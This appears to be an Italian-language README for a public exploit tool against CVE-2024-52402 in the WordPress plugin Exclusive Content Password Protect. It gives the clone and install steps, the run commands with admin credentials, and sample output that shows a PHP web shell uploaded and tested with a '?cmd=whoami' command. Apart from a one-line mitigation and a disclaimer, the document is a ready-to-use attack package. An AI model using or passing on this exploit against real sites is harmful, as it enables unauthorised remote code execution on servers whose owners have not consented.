
Plugin WordPress Exclusive Content Password Protect <= 1.1.0 - vulnerabilità CSRF per il caricamento arbitrario di file
Questo exploit prende di mira una vulnerabilità di Cross-Site Request Forgery (CSRF) nel plugin WordPress Exclusive Content Password Protect, nelle versioni fino alla 1.1.0 inclusa. Questa vulnerabilità consente a un attaccante di caricare una web shell sul server web, portando a una potenziale esecuzione di codice remoto.
Per sfruttare questa vulnerabilità, devi fornire l'URL del sito WordPress target, un nome utente WordPress valido e la password. Lo script di exploit accederà al sito WordPress e tenterà di caricare una web shell.
python CVE-2024-52402.py -u <target> -un <username> -p <password>
usage: CVE-2024-52402.py [-h] -u URL -un USERNAME -p PASSWORD
Exploit for ECVE-2024-52402 By | Nxploit, Khaled ALenazi
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress site URL
-un, --username USERNAME
WordPress username
-p, --password PASSWORD
WordPress password
python CVE-2024-52402.py -u http://target/wordpress -un admin -p admin
[+] Plugin version detected: 1.1.0
[+] Logged in successfully.
[!] Exploit completed! Web Shell uploaded: http://target/wordpress/wp-content/uploads/nxploit.php
[*] Test with: http://target/wordpress/wp-content/uploads/nxploit.php?cmd=whoami
Questo script sfrutta la vulnerabilità CSRF nel plugin Exclusive Content Password Protect per caricare una Web Shell sul server WordPress. Tuttavia, non esegue direttamente un attacco CSRF; si concentra invece sullo sfruttamento della funzionalità di upload file del plugin per ottenere lo sfruttamento.
Clonare il repository
git clone https://github.com/Nxploited/CVE-2024-52402.git
cd CVE-2024-52402
Installare i requisiti
Assicurati di avere la libreria requests installata:
pip install requests
Eseguire lo script Usa il seguente comando per eseguire lo script:
python CVE-2024-52402.py -u http://target/wordpress -un admin -p admin
Per mitigare questa vulnerabilità, aggiorna il plugin Exclusive Content Password Protect all'ultima versione in cui questo problema è stato risolto.
Questo script è destinato esclusivamente a scopi educativi. L'uso non autorizzato di questo script contro sistemi su cui non hai esplicito permesso di testare è illegale e non etico.
Exploit di: Nxploit, Khaled alenazi.